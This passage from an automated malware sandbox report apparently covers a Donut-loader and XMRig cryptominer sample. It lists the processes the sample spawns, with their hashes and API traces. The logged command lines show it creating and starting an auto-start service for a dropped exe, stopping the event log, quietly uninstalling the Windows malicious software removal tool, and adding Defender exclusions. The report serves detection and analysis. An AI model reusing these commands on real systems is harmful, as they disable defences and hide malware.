Commandline:	C:\Windows\system32\sc.exe delete "MXOLIHZI"
Imagebase:	0x7ff78c960000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	12:15:09
Start date:	17/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	12:15:09
Start date:	17/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	12:15:09
Start date:	17/06/2024
Path:	C:\Windows\System32\wusa.exe
Wow64 process (32bit):	false
Commandline:	wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff6359a0000
File size:	345'088 bytes
MD5 hash:	FBDA2B8987895780375FE0E6254F6198
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	12:15:09
Start date:	17/06/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe create "MXOLIHZI" binpath= "C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe" start= "auto"
Imagebase:	0x7ff78c960000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	12:15:09
Start date:	17/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	12:15:09
Start date:	17/06/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop eventlog
Imagebase:	0x7ff78c960000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	12:15:09
Start date:	17/06/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe start "MXOLIHZI"
Imagebase:	0x7ff78c960000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	12:15:09
Start date:	17/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	12:15:09
Start date:	17/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	12:15:09
Start date:	17/06/2024
Path:	C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe
Imagebase:	0x7ff63b540000
File size:	3'779'584 bytes
MD5 hash:	B99383ADE7723A2376AC12D1FF516AA6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000012.00000002.2251660159.00000122A4359000.00000004.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000012.00000002.2251423159.00000122A40B0000.00000020.00000001.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 45%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	12:15:09
Start date:	17/06/2024
Path:	C:\Windows\System32\notepad.exe
Wow64 process (32bit):
Commandline:	notepad.exe
Imagebase:
File size:	201'216 bytes
MD5 hash:	27F71B12CB585541885A31BE22F61C83
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	12:15:10
Start date:	17/06/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5960, Parent PID: 4904

General

Target ID:	21
Start time:	12:15:10
Start date:	17/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	12:15:11
Start date:	17/06/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff677ff0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 504, Parent PID: 5608

General

Target ID:	23
Start time:	12:15:11
Start date:	17/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	12:15:11
Start date:	17/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	12:15:11
Start date:	17/06/2024
Path:	C:\Windows\System32\wusa.exe
Wow64 process (32bit):	false
Commandline:	wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff6359a0000
File size:	345'088 bytes
MD5 hash:	FBDA2B8987895780375FE0E6254F6198
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	12:15:11
Start date:	17/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	conhost.exe
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001A.00000002.3409824385.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001A.00000002.3409824385.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	44.6%
Signature Coverage:	12.2%
Total number of Nodes:	74
Total number of Limit Nodes:	6

Executed Functions

Function 000001BB80981394 Relevance: 1.5, APIs: 1, Instructions: 38
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtEnumerateValueKey.NTDLL ref: 000001BB809813F7

Memory Dump Source

Source File: 00000000.00000002.2227514021.000001BB80981000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001BB80981000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1bb80981000_file.jbxd

Similarity

API ID: EnumerateValue
String ID:
API String ID: 1749906896-0
Opcode ID: 3e6086999d909772927b4a53b8ab5f9f85d395806cf9dc02ee7e905097e990c9
Instruction ID: 0b57603e4f7f899cd7db13a1d4b4412aadf2f684c65edc241f8ec5cf05e4a122
Opcode Fuzzy Hash: 3e6086999d909772927b4a53b8ab5f9f85d395806cf9dc02ee7e905097e990c9
Instruction Fuzzy Hash: 12F0C970519B058FEB48EF28D89991ABBF1F7A8341F00891EA085D3271DF79D580CB92

Function 00007FF72878D164 Relevance: 12.1, APIs: 8, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF72878D18D
__scrt_release_startup_lock.LIBCMT ref: 00007FF72878D1FB
_register_thread_local_exe_atexit_callback.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF72878D249
_get_initial_narrow_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF72878D24E
__p___argv.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF72878D256
__p___argc.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF72878D25E
_cexit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF72878D280
_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF72878D2DA

Memory Dump Source

Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true

Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd

Similarity

API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
String ID:
API String ID: 1133592946-0
Opcode ID: 8f35b274382aea9d74736abc4321152b8662125592f65204fea856f61f15728e
Instruction ID: 548359834897ec2aa62586ba0d4bdf0501000e844d1cda358586e88f4974ab29
Opcode Fuzzy Hash: 8f35b274382aea9d74736abc4321152b8662125592f65204fea856f61f15728e
Instruction Fuzzy Hash: 7F313B21E8820285FA50BBE59C153B9DA51EF8D784FC4003BEA0D473D7DE6FF444AA28

Function 000001BB8028D964 Relevance: 7.7, APIs: 5, Instructions: 174
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 000001BB8028D986

Memory Dump Source

Source File: 00000000.00000002.2226259589.000001BB80000000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001BB80000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1bb80000000_file.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3384dbaf04124ae408191e174ba91d228b647bba7aee9aeb13463d67c128df74
Instruction ID: a5655b562cc002bc7495784cb05033e285240d1d688a73cbd388ec6f5d5955e0
Opcode Fuzzy Hash: 3384dbaf04124ae408191e174ba91d228b647bba7aee9aeb13463d67c128df74
Instruction Fuzzy Hash: B551D634B0890E8FEF85EE5CC884BAE73F5FBA8310F504615A419D7694DBB4EA54CB41

Function 000001BB8028DB6B Relevance: 7.7, APIs: 5, Instructions: 174
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 000001BB8028DB8D

Memory Dump Source

Source File: 00000000.00000002.2226259589.000001BB80000000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001BB80000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1bb80000000_file.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f3343c76b6cd9d232af124fb01760c8ff8c6bf56e7b46f00006a0382ca75c8d6
Instruction ID: 3cd0cd3ef4f7e34c6d1c9cef8e5e8ececfc9695459e4be5f565582221148f1a7
Opcode Fuzzy Hash: f3343c76b6cd9d232af124fb01760c8ff8c6bf56e7b46f00006a0382ca75c8d6
Instruction Fuzzy Hash: 1351F634B1C90E8FDF81EE9CC884BAE73F5FBA8310F504625A41AD7694DBB4E9448B41

Function 00007FF728774A10 Relevance: 4.6, APIs: 3, Instructions: 91
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32 ref: 00007FF728774A96

Memory Dump Source

Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true

Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6e9120aa9af772301a4a386b5b1c0067b3c901f9ce423e8083d5da3411376083
Instruction ID: 2351752cb17b0db4bea51006334d651da66441b7a1d2668b83385c04a0f77b6a
Opcode Fuzzy Hash: 6e9120aa9af772301a4a386b5b1c0067b3c901f9ce423e8083d5da3411376083
Instruction Fuzzy Hash: A031D232B04A0185F760ABA4EC447ADE661EB887A8F548235DFAD07BD9DF3ED441C714

Function 000001BB8028A434 Relevance: 3.4, APIs: 2, Instructions: 399
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 000001BB8028A439

Memory Dump Source

Source File: 00000000.00000002.2226259589.000001BB80000000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001BB80000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1bb80000000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 92c0ea50874150b054a817daf60ee9fc003736d41b50868d266c4d75121e88d1
Instruction ID: 580fab301dbc4eac24727ef9b1f8260c9a726b4ca8096d71c04109c158a0853a
Opcode Fuzzy Hash: 92c0ea50874150b054a817daf60ee9fc003736d41b50868d266c4d75121e88d1
Instruction Fuzzy Hash: BCE1BC34A1890D8FEF95EB9CC085FAEB7F5FB58340F9441A4E509DB691DBB4E8809B40

Function 00007FF72877527C Relevance: 3.0, APIs: 2, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumProcessModulesEx.PSAPI ref: 00007FF728775267
memset.VCRUNTIME140 ref: 00007FF7287752C3

Memory Dump Source

Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true

Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd

Similarity

API ID: EnumModulesProcessmemset
String ID:
API String ID: 2788162479-0
Opcode ID: b080baafe9dc283cbf222f303f25dea2ccf790df6adc1ae6ee288a2e3dca6954
Instruction ID: 6a4260214a64be8d93e1c0dcc101fcf9253e2a79578dd7bb5324a1ab1385a3ea
Opcode Fuzzy Hash: b080baafe9dc283cbf222f303f25dea2ccf790df6adc1ae6ee288a2e3dca6954
Instruction Fuzzy Hash: A911C662F1465145EA00EBE1AD052AEE761FB08BA8FD00622DE2D237D5CF39E641E718

Function 00007FF7287756B0 Relevance: 2.5, APIs: 2, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNEL32 ref: 00007FF7287756CB
GetLastError.KERNEL32 ref: 00007FF7287756E0

Memory Dump Source

Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true

Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: ba2161fbdca203ce282a3bad5a3a37409828693ed662d9c325a3d7b7554e52e4
Instruction ID: 670e452ff3491a4d2f9ed3aab9290557d4ce2f7f60f71e371398f72990145e71
Opcode Fuzzy Hash: ba2161fbdca203ce282a3bad5a3a37409828693ed662d9c325a3d7b7554e52e4
Instruction Fuzzy Hash: 4D110D36F50B419CE710ABB0E8453EC77B4F748328F944236CAAC56B98EF399199C754

Function 000001BB8028B9B1 Relevance: 2.0, APIs: 1, Instructions: 708
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 000001BB8028BC36

Memory Dump Source

Source File: 00000000.00000002.2226259589.000001BB80000000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001BB80000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1bb80000000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: fdae6b7c3fcf00f9228dbd9d5a3c96208eade3a9fdb42b23f6d738a870b35c23
Instruction ID: d6427d8665d136f31c0b79b61f9c9599c8b7dd092013e335fcbf5c71c25d1aab
Opcode Fuzzy Hash: fdae6b7c3fcf00f9228dbd9d5a3c96208eade3a9fdb42b23f6d738a870b35c23
Instruction Fuzzy Hash: F252A274608A8D8FDBB5EF5CC888BE937E1FB68311F544125E84DCB261DBB4DA858B40

Non-executed Functions

Function 00007FF72877F4E0 Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 345libraryloadersynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObjectEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF72877F52B
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF72877F544
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF72877F57D
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF72877F5B7
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF72877F5EF
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF72877F608
memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF72877F65D
GetProcAddress.KERNEL32 ref: 00007FF72877F692
GetCurrentProcess.KERNEL32 ref: 00007FF72877F6AB
lstrlenW.KERNEL32 ref: 00007FF72877F6C9
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF72877F701
CreateMutexA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF72877F795
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF72877F7BB
GetProcAddress.KERNEL32 ref: 00007FF72877F859
GetCurrentProcess.KERNEL32 ref: 00007FF72877F872
GetProcAddress.KERNEL32 ref: 00007FF72877F8D9
GetCurrentProcess.KERNEL32 ref: 00007FF72877F8F2
ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF72877F95D

Strings

dbghelp.dll, xrefs: 00007FF72877F53D
SymGetOptions, xrefs: 00007FF72877F573
SymSetSearchPathW, xrefs: 00007FF72877F8D2
SymInitializeW, xrefs: 00007FF72877F5E8
SymSetOptions, xrefs: 00007FF72877F5B0
assertion failed: len >= 0, xrefs: 00007FF72877F994
SymGetSearchPathW, xrefs: 00007FF72877F68B
EnumerateLoadedModulesW64, xrefs: 00007FF72877F852

Memory Dump Source

Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true

Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd

Similarity

API ID: AddressProc$CurrentProcess$Mutex$CloseCreateHandleLibraryLoadObjectReleaseSingleWaitlstrlenmemset
String ID: EnumerateLoadedModulesW64$SymGetOptions$SymGetSearchPathW$SymInitializeW$SymSetOptions$SymSetSearchPathW$assertion failed: len >= 0$dbghelp.dll
API String ID: 18767598-310313858
Opcode ID: fc5280adfdf2b7853c24edd48576d698f2f70bb9135b4bc86369705f9db9025e
Instruction ID: adeb9ca79c027783d1a675311c4835ad36b1fc5761be14ca3fddebf411baedc6
Opcode Fuzzy Hash: fc5280adfdf2b7853c24edd48576d698f2f70bb9135b4bc86369705f9db9025e
Instruction Fuzzy Hash: 57F1BE21A59A4285FB10ABA5EC007BDE7A0FF58748F844536DD5D43BA4EF3EE144CB28

Function 00007FF72877FC10 Relevance: 21.4, APIs: 6, Strings: 6, Instructions: 378libraryloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00000001,00000000,00007FF72877F959), ref: 00007FF72877FC42
GetProcAddress.KERNEL32(?,?,?,?,00000001,00000000,00007FF72877F959), ref: 00007FF72877FC7F
GetProcAddress.KERNEL32 ref: 00007FF72877FCD2
memset.VCRUNTIME140(?,?,?,?,00000001,00000000,00007FF72877F959), ref: 00007FF72877FDD9
GetProcAddress.KERNEL32 ref: 00007FF72877FE0E

Strings

SymAddrIncludeInlineTrace, xrefs: 00007FF72877FC78
(, xrefs: 00007FF728780169
SymGetLineFromInlineContextW, xrefs: 00007FF72878018C
SymFromInlineContextW, xrefs: 00007FF72877FE07
SymQueryInlineTrace, xrefs: 00007FF72877FCCB
X, xrefs: 00007FF72877FDE9

Memory Dump Source

Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true

Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd

Similarity

API ID: AddressProc$CurrentProcessmemset
String ID: ($SymAddrIncludeInlineTrace$SymFromInlineContextW$SymGetLineFromInlineContextW$SymQueryInlineTrace$X
API String ID: 3017635649-489855731
Opcode ID: 91fedcdd78195c4bbe2e5efc2779d755cb09886c5593213c54159d6beb6d4a23
Instruction ID: df662d09b0f99cab3fb5331d0323fabe44b7da260722a165a1c578f4a319ddb7
Opcode Fuzzy Hash: 91fedcdd78195c4bbe2e5efc2779d755cb09886c5593213c54159d6beb6d4a23
Instruction Fuzzy Hash: 4102CF32A49A8182EB759B54EC413FAF7A0FB88794F804236DA9D03B94DF3ED544CB54

Function 00007FF72878D6F0 Relevance: 13.6, APIs: 9, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF72878D70C
memset.VCRUNTIME140 ref: 00007FF72878D730
RtlCaptureContext.NTDLL ref: 00007FF72878D739
RtlLookupFunctionEntry.NTDLL ref: 00007FF72878D753
RtlVirtualUnwind.NTDLL ref: 00007FF72878D794
memset.VCRUNTIME140 ref: 00007FF72878D7C7
IsDebuggerPresent.KERNEL32 ref: 00007FF72878D7E8
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF72878D805
UnhandledExceptionFilter.KERNEL32 ref: 00007FF72878D810

Memory Dump Source

Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true

Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 313767242-0
Opcode ID: 1f7091696ee9927cd8a0f810869b6f58b34cd09c9738cf120ea40d67f48f4156
Instruction ID: dd8839da49120a9180ee648cec52d676759c809c82405054637e75f96b04d73a
Opcode Fuzzy Hash: 1f7091696ee9927cd8a0f810869b6f58b34cd09c9738cf120ea40d67f48f4156
Instruction Fuzzy Hash: 6C316372645B8186EB609FA1EC403EDB760FB48744F84403ADA4D47794DF39D648CB14

Function 00007FF72877D5F0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 232windowCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF72877D633
GetModuleHandleW.KERNEL32 ref: 00007FF72877D64C
FormatMessageW.KERNEL32 ref: 00007FF72877D694
GetLastError.KERNEL32 ref: 00007FF72877D75D

Strings

NTDLL.DLL, xrefs: 00007FF72877D645
assertion failed: self.is_char_boundary(new_len)/rustc/9b00956e56009bab2aa15d7bff10916599e3d6d6\library\alloc\src\string.rs, xrefs: 00007FF72877D990

Memory Dump Source

Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true

Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File

